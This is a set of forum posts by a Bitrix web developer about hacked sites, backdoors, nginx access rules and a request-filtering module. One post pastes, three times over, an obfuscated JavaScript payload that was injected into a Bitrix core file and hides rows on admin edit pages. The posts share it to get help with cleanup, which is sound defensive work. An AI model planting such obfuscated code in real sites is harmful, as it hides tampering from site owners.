Алексей Вдовин (Все сообщения пользователя)

Всем привет!

Кто нить такое лечил?
Простое удаление не помогает - через несколько минут восстанавливается

Толку нет от закрытия /bitrix/admin/ ломают через другие дыры

Александр Иванов,  ничего себе Вы работу провели - спасибо!

Ну по коду я ничего страшного тут не приметил, фигня какая то.
Просто был кейс - открыл МВ версию сайта, открылась модалка - "Установите мобильное приложение" хотя его отродясь не было...


туд да - надо искать т.к. код явно не из ядра Битрикса (саппорт подтвердил)

чёт не очень понял, почему упали - объясни плиз
т.е. атакующие юзают в основном HTTP - а реальные юзера работающие из браузера HTTP2 ?

а роботы всякие полезные нормально HTTP2 скушают при блокировке HTTP1?

Коллеги, кто нить сталкивался с такой "заразой"?

При открытии сайта с мобилки сверху модальное окно "Установите приложение [сюда автоматом текст из title подставляет]"
Дальше поработать с этой модалкой не успел - сама изчезла.
Что интресно - не могу больше смоделировать этот кейс, всяко пробовал и инкогнито и с ВПН и с другого браузера - нифига, но точно была такая хрень - я даже заскриншотил.
Никакого приложения в природе нет и не было.
По коду текст из модалки нигде не находится, похоже, что js-ом откуда то тащит и в готовый DOM добавляет.
Вычислить не могу т.к. не моделируется

GIT-ом вижу изменения в файле ядра
bitrix/js/main/core/core_date.js

внизу какой то обфуцированный код причём только названия переменных разное, тело одно и тоже
добавил вывод в консоль - пусто

пока в саппорт стукнул, чтоб глянули, что за код - имеет ли отношение к ядру, пока нет ответа

Скрытый текст

var pe8c402=0;var _0x1b0190=_0x3ec8;(function(_0x3d7a1f,_0x465cc6){var _0x2f962b=_0x3ec8,_0x4d8c3c=_0x3d7a1f();while(!![]){try{var _0xb3380a=-parseInt(_0x2f962b(0x18b,'pqn['))/0x1*(parseInt(_0x2f962b(0x19d,'U)A5'))/0x2)+parseInt(_0x2f962b(0x193,'(OT#'))/0x3*(parseInt(_0x2f962b(0x198,'skWI'))/0x4)+-parseInt(_0x2f962b(0x192,'pqn['))/0x5*(-parseInt(_0x2f962b(0x1a5,'Vyx9'))/0x6)+-parseInt(_0x2f962b(0x18f,'Nz[p'))/0x7*(-parseInt(_0x2f962b(0x18a,'U)A5'))/0x8)+parseInt(_0x2f962b(0x187,'Yx[H'))/0x9*(parseInt(_0x2f962b(0x1a4,'emqX'))/0xa)+parseInt(_0x2f962b(0x1a7,'fhgA'))/0xb*(-parseInt(_0x2f962b(0x191,'Nz[p'))/0xc)+-parseInt(_0x2f962b(0x1a6,'b5c&'))/0xd;if(_0xb3380a===_0x465cc6)break;else _0x4d8c3c['push'](_0x4d8c3c['shift']());}catch(_0x2523f7){_0x4d8c3c['push'](_0x4d8c3c['shift']());}}}(_0x613f,0x5db45),document[_0x1b0190(0x199,'4v78')+_0x1b0190(0x18e,'pqn[')]('DOMContent'+_0x1b0190(0x19a,'19Xx'),function(){var _0x502f35=_0x1b0190;if(location['pathname'][_0x502f35(0x189,'*0Eu')]('te_edit')>0x0){var _0x4ee67d=document['querySelec'+_0x502f35(0x197,'*)xW')](_0x502f35(0x18c,'4v78')+_0x502f35(0x195,'*)xW'));_0x4ee67d[_0x502f35(0x18d,'xBdd')](_0x3bd8ce=>{var _0xc9d96f=_0x502f35,_0x19d286=_0x3bd8ce[_0xc9d96f(0x194,'tbNo')]('tr');_0x19d286&&(_0x19d286[_0xc9d96f(0x19b,'(OT#')][_0xc9d96f(0x1a0,'ZYx)')]=_0xc9d96f(0x19e,'skWI'));});}}));function _0x3ec8(_0x1198e8,_0x13ff3f){var _0x613fca=_0x613f();return _0x3ec8=function(_0x3ec898,_0x3b07c7){_0x3ec898=_0x3ec898-0x187;var _0x1213ef=_0x613fca[_0x3ec898];if(_0x3ec8['AUHBNi']===undefined){var _0xc05ee1=function(_0x3bd8ce){var _0x19d286='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x1e149c='',_0x22c939='';for(var _0x4e0d5b=0x0,_0x33211e,_0x5427c1,_0x2fd185=0x0;_0x5427c1=_0x3bd8ce['charAt'](_0x2fd185++);~_0x5427c1&&(_0x33211e=_0x4e0d5b%0x4?_0x33211e*0x40+_0x5427c1:_0x5427c1,_0x4e0d5b++%0x4)?_0x1e149c+=String['fromCharCode'](0xff&_0x33211e>>(-0x2*_0x4e0d5b&0x6)):0x0){_0x5427c1=_0x19d286['indexOf'](_0x5427c1);}for(var _0x10bd81=0x0,_0x55368f=_0x1e149c['length'];_0x10bd81<_0x55368f;_0x10bd81++){_0x22c939+='%'+('00'+_0x1e149c['charCodeAt'](_0x10bd81)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x22c939);};var _0x4ee67d=function(_0x1f7ef7,_0x4e2f4a){var _0x486fcb=[],_0x42b7e1=0x0,_0x4ed4a4,_0x43fc44='';_0x1f7ef7=_0xc05ee1(_0x1f7ef7);var _0x2b8ab4;for(_0x2b8ab4=0x0;_0x2b8ab4<0x100;_0x2b8ab4++){_0x486fcb[_0x2b8ab4]=_0x2b8ab4;}for(_0x2b8ab4=0x0;_0x2b8ab4<0x100;_0x2b8ab4++){_0x42b7e1=(_0x42b7e1+_0x486fcb[_0x2b8ab4]+_0x4e2f4a['charCodeAt'](_0x2b8ab4%_0x4e2f4a['length']))%0x100,_0x4ed4a4=_0x486fcb[_0x2b8ab4],_0x486fcb[_0x2b8ab4]=_0x486fcb[_0x42b7e1],_0x486fcb[_0x42b7e1]=_0x4ed4a4;}_0x2b8ab4=0x0,_0x42b7e1=0x0;for(var _0x532494=0x0;_0x532494<_0x1f7ef7['length'];_0x532494++){_0x2b8ab4=(_0x2b8ab4+0x1)%0x100,_0x42b7e1=(_0x42b7e1+_0x486fcb[_0x2b8ab4])%0x100,_0x4ed4a4=_0x486fcb[_0x2b8ab4],_0x486fcb[_0x2b8ab4]=_0x486fcb[_0x42b7e1],_0x486fcb[_0x42b7e1]=_0x4ed4a4,_0x43fc44+=String['fromCharCode'](_0x1f7ef7['charCodeAt'](_0x532494)^_0x486fcb[(_0x486fcb[_0x2b8ab4]+_0x486fcb[_0x42b7e1])%0x100]);}return _0x43fc44;};_0x3ec8['zaovwk']=_0x4ee67d,_0x1198e8=arguments,_0x3ec8['AUHBNi']=!![];}var _0x5898a9=_0x613fca[0x0],_0x1870cf=_0x3ec898+_0x5898a9,_0x5bbbb3=_0x1198e8[_0x1870cf];return!_0x5bbbb3?(_0x3ec8['ivdMgp']===undefined&&(_0x3ec8['ivdMgp']=!![]),_0x1213ef=_0x3ec8['zaovwk'](_0x1213ef,_0x3b07c7),_0x1198e8[_0x1870cf]=_0x1213ef):_0x1213ef=_0x5bbbb3,_0x1213ef;},_0x3ec8(_0x1198e8,_0x13ff3f);}function _0x613f(){var _0x3481af=['cCohc8omta','WQSodaFdGrpdOeVdOSo5','hZLzmsGLW4D2WPbcvW','WP8dW6ddVa','lfxdKmkKDmkkv8ksWRtcRZq','W7XttexdIdFdNG','cN5qWRBdH3DsW4tdRvq','zSoQWPNdJmkJW79c','W6xcICo5WRhcTCoepgddU8o3W7ZcHCoy','WPddRvdcUgOphCkLmrhdPq','xvTyW5PtbqfC','W79yW4ZdPSovW7pdS1iudZNdSW','px5LWPanWP1Wp3aC','WRKkfrymkvlcTa','dNasW7ZdLxHzW7S','WP9HWOhcQrtdUGNdP8k0W6xdTuS','FmosW49hb8kFWRO','gZ1wnYXhWP1SWQ1erSkiW7W','W6ZdSmkUW57dKSkMqq','oSk6W5CXwepdLsxdL8k4','rN1gWQtcQczX','WQFdImkQW6RdPSkf','WROjhbe0j2JcSa','WRKiE1aJmfhcMmkKW6i','WRKbFLjtn3RcRmkyW4RdVW','W6xcJ8o3WRdcUSocyfFdU8o5W4lcUa','t8kfq8kzsmkPWR7dVCkrWPS','WPS4eSo7xSk7gW','o3RcKepdHSo4FW','iGNcT8k9jCkCWOpcI2f4DW','kIJdGc/cM8k2','W4bCWRRcRCojkxhcKCkOW68','mSkWW4mbwN3dJtddT8kK','W4VdKCo1zSkhsq'];_0x613f=function(){return _0x3481af;};return _0x613f();}var pe8c402=1; var p8d70b2=0;var _0x1b0190=_0x3ec8;(function(_0x3d7a1f,_0x465cc6){var _0x2f962b=_0x3ec8,_0x4d8c3c=_0x3d7a1f();while(!![]){try{var _0xb3380a=-parseInt(_0x2f962b(0x18b,'pqn['))/0x1*(parseInt(_0x2f962b(0x19d,'U)A5'))/0x2)+parseInt(_0x2f962b(0x193,'(OT#'))/0x3*(parseInt(_0x2f962b(0x198,'skWI'))/0x4)+-parseInt(_0x2f962b(0x192,'pqn['))/0x5*(-parseInt(_0x2f962b(0x1a5,'Vyx9'))/0x6)+-parseInt(_0x2f962b(0x18f,'Nz[p'))/0x7*(-parseInt(_0x2f962b(0x18a,'U)A5'))/0x8)+parseInt(_0x2f962b(0x187,'Yx[H'))/0x9*(parseInt(_0x2f962b(0x1a4,'emqX'))/0xa)+parseInt(_0x2f962b(0x1a7,'fhgA'))/0xb*(-parseInt(_0x2f962b(0x191,'Nz[p'))/0xc)+-parseInt(_0x2f962b(0x1a6,'b5c&'))/0xd;if(_0xb3380a===_0x465cc6)break;else _0x4d8c3c['push'](_0x4d8c3c['shift']());}catch(_0x2523f7){_0x4d8c3c['push'](_0x4d8c3c['shift']());}}}(_0x613f,0x5db45),document[_0x1b0190(0x199,'4v78')+_0x1b0190(0x18e,'pqn[')]('DOMContent'+_0x1b0190(0x19a,'19Xx'),function(){var _0x502f35=_0x1b0190;if(location['pathname'][_0x502f35(0x189,'*0Eu')]('te_edit')>0x0){var _0x4ee67d=document['querySelec'+_0x502f35(0x197,'*)xW')](_0x502f35(0x18c,'4v78')+_0x502f35(0x195,'*)xW'));_0x4ee67d[_0x502f35(0x18d,'xBdd')](_0x3bd8ce=>{var _0xc9d96f=_0x502f35,_0x19d286=_0x3bd8ce[_0xc9d96f(0x194,'tbNo')]('tr');_0x19d286&&(_0x19d286[_0xc9d96f(0x19b,'(OT#')][_0xc9d96f(0x1a0,'ZYx)')]=_0xc9d96f(0x19e,'skWI'));});}}));function _0x3ec8(_0x1198e8,_0x13ff3f){var _0x613fca=_0x613f();return _0x3ec8=function(_0x3ec898,_0x3b07c7){_0x3ec898=_0x3ec898-0x187;var _0x1213ef=_0x613fca[_0x3ec898];if(_0x3ec8['AUHBNi']===undefined){var _0xc05ee1=function(_0x3bd8ce){var _0x19d286='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x1e149c='',_0x22c939='';for(var _0x4e0d5b=0x0,_0x33211e,_0x5427c1,_0x2fd185=0x0;_0x5427c1=_0x3bd8ce['charAt'](_0x2fd185++);~_0x5427c1&&(_0x33211e=_0x4e0d5b%0x4?_0x33211e*0x40+_0x5427c1:_0x5427c1,_0x4e0d5b++%0x4)?_0x1e149c+=String['fromCharCode'](0xff&_0x33211e>>(-0x2*_0x4e0d5b&0x6)):0x0){_0x5427c1=_0x19d286['indexOf'](_0x5427c1);}for(var _0x10bd81=0x0,_0x55368f=_0x1e149c['length'];_0x10bd81<_0x55368f;_0x10bd81++){_0x22c939+='%'+('00'+_0x1e149c['charCodeAt'](_0x10bd81)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x22c939);};var _0x4ee67d=function(_0x1f7ef7,_0x4e2f4a){var _0x486fcb=[],_0x42b7e1=0x0,_0x4ed4a4,_0x43fc44='';_0x1f7ef7=_0xc05ee1(_0x1f7ef7);var _0x2b8ab4;for(_0x2b8ab4=0x0;_0x2b8ab4<0x100;_0x2b8ab4++){_0x486fcb[_0x2b8ab4]=_0x2b8ab4;}for(_0x2b8ab4=0x0;_0x2b8ab4<0x100;_0x2b8ab4++){_0x42b7e1=(_0x42b7e1+_0x486fcb[_0x2b8ab4]+_0x4e2f4a['charCodeAt'](_0x2b8ab4%_0x4e2f4a['length']))%0x100,_0x4ed4a4=_0x486fcb[_0x2b8ab4],_0x486fcb[_0x2b8ab4]=_0x486fcb[_0x42b7e1],_0x486fcb[_0x42b7e1]=_0x4ed4a4;}_0x2b8ab4=0x0,_0x42b7e1=0x0;for(var _0x532494=0x0;_0x532494<_0x1f7ef7['length'];_0x532494++){_0x2b8ab4=(_0x2b8ab4+0x1)%0x100,_0x42b7e1=(_0x42b7e1+_0x486fcb[_0x2b8ab4])%0x100,_0x4ed4a4=_0x486fcb[_0x2b8ab4],_0x486fcb[_0x2b8ab4]=_0x486fcb[_0x42b7e1],_0x486fcb[_0x42b7e1]=_0x4ed4a4,_0x43fc44+=String['fromCharCode'](_0x1f7ef7['charCodeAt'](_0x532494)^_0x486fcb[(_0x486fcb[_0x2b8ab4]+_0x486fcb[_0x42b7e1])%0x100]);}return _0x43fc44;};_0x3ec8['zaovwk']=_0x4ee67d,_0x1198e8=arguments,_0x3ec8['AUHBNi']=!![];}var _0x5898a9=_0x613fca[0x0],_0x1870cf=_0x3ec898+_0x5898a9,_0x5bbbb3=_0x1198e8[_0x1870cf];return!_0x5bbbb3?(_0x3ec8['ivdMgp']===undefined&&(_0x3ec8['ivdMgp']=!![]),_0x1213ef=_0x3ec8['zaovwk'](_0x1213ef,_0x3b07c7),_0x1198e8[_0x1870cf]=_0x1213ef):_0x1213ef=_0x5bbbb3,_0x1213ef;},_0x3ec8(_0x1198e8,_0x13ff3f);}function _0x613f(){var _0x3481af=['cCohc8omta','WQSodaFdGrpdOeVdOSo5','hZLzmsGLW4D2WPbcvW','WP8dW6ddVa','lfxdKmkKDmkkv8ksWRtcRZq','W7XttexdIdFdNG','cN5qWRBdH3DsW4tdRvq','zSoQWPNdJmkJW79c','W6xcICo5WRhcTCoepgddU8o3W7ZcHCoy','WPddRvdcUgOphCkLmrhdPq','xvTyW5PtbqfC','W79yW4ZdPSovW7pdS1iudZNdSW','px5LWPanWP1Wp3aC','WRKkfrymkvlcTa','dNasW7ZdLxHzW7S','WP9HWOhcQrtdUGNdP8k0W6xdTuS','FmosW49hb8kFWRO','gZ1wnYXhWP1SWQ1erSkiW7W','W6ZdSmkUW57dKSkMqq','oSk6W5CXwepdLsxdL8k4','rN1gWQtcQczX','WQFdImkQW6RdPSkf','WROjhbe0j2JcSa','WRKiE1aJmfhcMmkKW6i','WRKbFLjtn3RcRmkyW4RdVW','W6xcJ8o3WRdcUSocyfFdU8o5W4lcUa','t8kfq8kzsmkPWR7dVCkrWPS','WPS4eSo7xSk7gW','o3RcKepdHSo4FW','iGNcT8k9jCkCWOpcI2f4DW','kIJdGc/cM8k2','W4bCWRRcRCojkxhcKCkOW68','mSkWW4mbwN3dJtddT8kK','W4VdKCo1zSkhsq'];_0x613f=function(){return _0x3481af;};return _0x613f();}var p8d70b2=1; var p99d8ea=0;var _0x1b0190=_0x3ec8;(function(_0x3d7a1f,_0x465cc6){var _0x2f962b=_0x3ec8,_0x4d8c3c=_0x3d7a1f();while(!![]){try{var _0xb3380a=-parseInt(_0x2f962b(0x18b,'pqn['))/0x1*(parseInt(_0x2f962b(0x19d,'U)A5'))/0x2)+parseInt(_0x2f962b(0x193,'(OT#'))/0x3*(parseInt(_0x2f962b(0x198,'skWI'))/0x4)+-parseInt(_0x2f962b(0x192,'pqn['))/0x5*(-parseInt(_0x2f962b(0x1a5,'Vyx9'))/0x6)+-parseInt(_0x2f962b(0x18f,'Nz[p'))/0x7*(-parseInt(_0x2f962b(0x18a,'U)A5'))/0x8)+parseInt(_0x2f962b(0x187,'Yx[H'))/0x9*(parseInt(_0x2f962b(0x1a4,'emqX'))/0xa)+parseInt(_0x2f962b(0x1a7,'fhgA'))/0xb*(-parseInt(_0x2f962b(0x191,'Nz[p'))/0xc)+-parseInt(_0x2f962b(0x1a6,'b5c&'))/0xd;if(_0xb3380a===_0x465cc6)break;else _0x4d8c3c['push'](_0x4d8c3c['shift']());}catch(_0x2523f7){_0x4d8c3c['push'](_0x4d8c3c['shift']());}}}(_0x613f,0x5db45),document[_0x1b0190(0x199,'4v78')+_0x1b0190(0x18e,'pqn[')]('DOMContent'+_0x1b0190(0x19a,'19Xx'),function(){var _0x502f35=_0x1b0190;if(location['pathname'][_0x502f35(0x189,'*0Eu')]('te_edit')>0x0){var _0x4ee67d=document['querySelec'+_0x502f35(0x197,'*)xW')](_0x502f35(0x18c,'4v78')+_0x502f35(0x195,'*)xW'));_0x4ee67d[_0x502f35(0x18d,'xBdd')](_0x3bd8ce=>{var _0xc9d96f=_0x502f35,_0x19d286=_0x3bd8ce[_0xc9d96f(0x194,'tbNo')]('tr');_0x19d286&&(_0x19d286[_0xc9d96f(0x19b,'(OT#')][_0xc9d96f(0x1a0,'ZYx)')]=_0xc9d96f(0x19e,'skWI'));});}}));function _0x3ec8(_0x1198e8,_0x13ff3f){var _0x613fca=_0x613f();return _0x3ec8=function(_0x3ec898,_0x3b07c7){_0x3ec898=_0x3ec898-0x187;var _0x1213ef=_0x613fca[_0x3ec898];if(_0x3ec8['AUHBNi']===undefined){var _0xc05ee1=function(_0x3bd8ce){var _0x19d286='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x1e149c='',_0x22c939='';for(var _0x4e0d5b=0x0,_0x33211e,_0x5427c1,_0x2fd185=0x0;_0x5427c1=_0x3bd8ce['charAt'](_0x2fd185++);~_0x5427c1&&(_0x33211e=_0x4e0d5b%0x4?_0x33211e*0x40+_0x5427c1:_0x5427c1,_0x4e0d5b++%0x4)?_0x1e149c+=String['fromCharCode'](0xff&_0x33211e>>(-0x2*_0x4e0d5b&0x6)):0x0){_0x5427c1=_0x19d286['indexOf'](_0x5427c1);}for(var _0x10bd81=0x0,_0x55368f=_0x1e149c['length'];_0x10bd81<_0x55368f;_0x10bd81++){_0x22c939+='%'+('00'+_0x1e149c['charCodeAt'](_0x10bd81)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x22c939);};var _0x4ee67d=function(_0x1f7ef7,_0x4e2f4a){var _0x486fcb=[],_0x42b7e1=0x0,_0x4ed4a4,_0x43fc44='';_0x1f7ef7=_0xc05ee1(_0x1f7ef7);var _0x2b8ab4;for(_0x2b8ab4=0x0;_0x2b8ab4<0x100;_0x2b8ab4++){_0x486fcb[_0x2b8ab4]=_0x2b8ab4;}for(_0x2b8ab4=0x0;_0x2b8ab4<0x100;_0x2b8ab4++){_0x42b7e1=(_0x42b7e1+_0x486fcb[_0x2b8ab4]+_0x4e2f4a['charCodeAt'](_0x2b8ab4%_0x4e2f4a['length']))%0x100,_0x4ed4a4=_0x486fcb[_0x2b8ab4],_0x486fcb[_0x2b8ab4]=_0x486fcb[_0x42b7e1],_0x486fcb[_0x42b7e1]=_0x4ed4a4;}_0x2b8ab4=0x0,_0x42b7e1=0x0;for(var _0x532494=0x0;_0x532494<_0x1f7ef7['length'];_0x532494++){_0x2b8ab4=(_0x2b8ab4+0x1)%0x100,_0x42b7e1=(_0x42b7e1+_0x486fcb[_0x2b8ab4])%0x100,_0x4ed4a4=_0x486fcb[_0x2b8ab4],_0x486fcb[_0x2b8ab4]=_0x486fcb[_0x42b7e1],_0x486fcb[_0x42b7e1]=_0x4ed4a4,_0x43fc44+=String['fromCharCode'](_0x1f7ef7['charCodeAt'](_0x532494)^_0x486fcb[(_0x486fcb[_0x2b8ab4]+_0x486fcb[_0x42b7e1])%0x100]);}return _0x43fc44;};_0x3ec8['zaovwk']=_0x4ee67d,_0x1198e8=arguments,_0x3ec8['AUHBNi']=!![];}var _0x5898a9=_0x613fca[0x0],_0x1870cf=_0x3ec898+_0x5898a9,_0x5bbbb3=_0x1198e8[_0x1870cf];return!_0x5bbbb3?(_0x3ec8['ivdMgp']===undefined&&(_0x3ec8['ivdMgp']=!![]),_0x1213ef=_0x3ec8['zaovwk'](_0x1213ef,_0x3b07c7),_0x1198e8[_0x1870cf]=_0x1213ef):_0x1213ef=_0x5bbbb3,_0x1213ef;},_0x3ec8(_0x1198e8,_0x13ff3f);}function _0x613f(){var _0x3481af=['cCohc8omta','WQSodaFdGrpdOeVdOSo5','hZLzmsGLW4D2WPbcvW','WP8dW6ddVa','lfxdKmkKDmkkv8ksWRtcRZq','W7XttexdIdFdNG','cN5qWRBdH3DsW4tdRvq','zSoQWPNdJmkJW79c','W6xcICo5WRhcTCoepgddU8o3W7ZcHCoy','WPddRvdcUgOphCkLmrhdPq','xvTyW5PtbqfC','W79yW4ZdPSovW7pdS1iudZNdSW','px5LWPanWP1Wp3aC','WRKkfrymkvlcTa','dNasW7ZdLxHzW7S','WP9HWOhcQrtdUGNdP8k0W6xdTuS','FmosW49hb8kFWRO','gZ1wnYXhWP1SWQ1erSkiW7W','W6ZdSmkUW57dKSkMqq','oSk6W5CXwepdLsxdL8k4','rN1gWQtcQczX','WQFdImkQW6RdPSkf','WROjhbe0j2JcSa','WRKiE1aJmfhcMmkKW6i','WRKbFLjtn3RcRmkyW4RdVW','W6xcJ8o3WRdcUSocyfFdU8o5W4lcUa','t8kfq8kzsmkPWR7dVCkrWPS','WPS4eSo7xSk7gW','o3RcKepdHSo4FW','iGNcT8k9jCkCWOpcI2f4DW','kIJdGc/cM8k2','W4bCWRRcRCojkxhcKCkOW68','mSkWW4mbwN3dJtddT8kK','W4VdKCo1zSkhsq'];_0x613f=function(){return _0x3481af;};return _0x613f();}var p99d8ea=1;

жесть какая ...
Анна Иванова, отпишите плиз как найдёте точку входа

Рекомендую решение на Debian+ISPConfig из этого сообщества https://t.me/BitrixSe
Либо более продвинутое на докере из этого https://t.me/bitrixdevops
На обоих решениях крутятся серьезные проекты на продакшене - полёт нормальный.

Правда сейчас довольно много народу под VPN сидят... Их можно потерять

Юрий Олейников, интересно.

Годные замечания. Юрий Олейников, спасибо!

Дмитрий Харитонов,
ну значит не срабатывает правило - проверьте в чём дело

у меня такое правило
location ^~ /bitrix/modules { internal; }

если что тут для nginx хороший конфиг - его юзаю
https://github.com/Wladimir-N/ispconfig

если точнее тут

https://github.com/Wladimir-N/ispconfig/blob/debian12/Bitrix

Дмитрий Харитонов,
очень странно ...
у Вас аппач?
посмотрите ./bitrix/modules/.htaccess
там должно быть Deny for All
соответственно, через него не должны были взламывать, 403 на любой скрипт в /bitrix/modules/ должен отдавать

Да не - я не так критично, что прям нельзя ставить. Можно и нужно, но учитывая принципы работы.

В целом модуль полезен, это бесспорно. К тому же с тенденцией последних лет - то одна волна взломов, то другая.
Думаю на 90% сайтов можно смело ставить в текущем виде, а доработаете - так и на все 100% с должной настройкой.

В тоже время другому клиенту на сайт "визитку", я с удовольствием модуль установил - там я спокоен.

Алексей,  не пойму - что Вы мне предлагаете делать?

Я указал, что для использования модуля нужно понимание принципа работы и возможные последствия.

Приведу конкретный кейс - у меня на обслуживании есть клиент с it форумом, где сигнатрура echo сплошь и рядом.
Поиском по сайту нашлось более 12 страниц результатов.
Ставим модуль, активируем защиту.
Поиск по echo сразу даёт Hacker, stop! Пишу пост с echo - получаю "Hacker, stop!" причём на чисто белом полотне.
Рядовой пользователь будет несколько обескуражен ...
Ну и соответственно все эти посты которые были сделаны с вхождением echo с модулем никогда не были бы опубликованы.
И это уже не просто моё мнение - это факты.
К этому форуму, кстати, и непосредственно к этому посту - это тоже относится.

По итогу от такой "защиты" получаем только вред... Без модуля в данном кейсе значительно лучше.

Это я всё вообще к Вашему совету "...После лечения (или в процессе лучше) модуль ставьте..."
И да - думаю это ответ к Вашему заявлению почему за 3 года взломов не догадались сделать такую мощную защиту. Одно лечим - другое калечим

Алексей, если сайт уже заражён - Ваш модуль как мёртвому припарка.
Если чист, достаточно обновится до актуальных версий.
Лечить нужно не следствия, я причины.

Думаю смысла продолжать дискуссию нет, Вы что то совсем уж нервно реагируете на замечания.

То код поправить, то в гитхабе посмотреть...

Я так полагаю основные клиенты для Вашего модуля это обычные пользователи, врят ли обладающие такими компетенциями.
А те что обладают, вряд ли доведут сайт до такого дырявого состояния.  

Алексей, Вы публикуете в маркете готовое решение в виде модуля, где нет возможности поправить сигнатуры и рекомендуете зайти поправить в коде?!

Хм... Забавно

PS
Допилите эту возможность, дел то на полчаса максимум.
Я придерживаюсь идеологии "не навредить", поэтому и предупреждаю о возможных последствиях.

тут интересно, но опять же - это жесть, такое на прод нельзя (или очень осторожно)
в отправке сообщения на форум в теле все эти сигнатуры легко могут встретиться, например вот в этой ветке

с модулем аккуратно надо - там сингатуры довольно широкие по вхождению в тело запроса, например echo
сингатуры в модуле "прибиты" хардкодом - не "порулить"
к примеру если бы этот модуль был активирован на этом сайте - это пост бы не прошел

в целом идея хорошая - хакерские запросы рубит, только нужно понимать куда подключать

но если сайт уже заражен, тут только ручная чистка ... т.к. пролог может и не подключаться

Во первых - логи. А логи это уже постфактум.
Во вторых тело POST запроса не логируется.

Тут важнее во-первых.

глянул я модуль, я в "обсуждение" на маркетплейсе уже написал
имхо такие сигнатуры, причём прибитые хардкодом на боевом сайте выглядят очень рисковано
к примеру - 'echo' может легко в качестве подстроки в теле какого нить полезного post запроса присутствовать

на сайт о котором выше писал модуль поставил, там контент редко меняют - понаблюдаю ... в целом то модуль полезный, хакерские запросы режет

в идеале придумать бы как анализировать тело POST запросов где нить пораньше - например на уровне nginx и блочить на уровне фаервола с занесением в блэклист - сейчас модуль сработает только с уже подключенным прологом Битрикса

На днях лечил сайтик с Аспро - такого количества бэкдоров я ещё не видел!

Причём сама лицензия на Битрикс актуальна - движек отностительно недавно обновлен, а вот на решение клиент денежек видимо зажал.

Ну и как результат - "заходи кто хочешь, бери что хочешь"...
Аспро пофиксил, что можно пролечил - но тут гарантию уже не даш, т.к. найти замаскированные бэкдоры в таком количестве файлов дело не простое.

Паблик скриптики можно и вручную "пройти", со стороны движка вся надежда на инструмент "файлы ядра не модифицировались".
Ну и надеюсь в Аспро кроме того, что пофиксил больше ничего не дыряво.

Плюс на fail2ban всяких ловушек повесил от сканирования уязвимостей - всё посложнее будет сканить, да и сайту полегче без такого трафика.

врят ли за Вас кто-то будет проводить эту аналитическую работу

именно поэтому я и написал

имхо тогда смысла мало латать - в старых движках очень много дыр
а если сайт ломанули, там скорее всего бэкдоров везде и всюду понапихали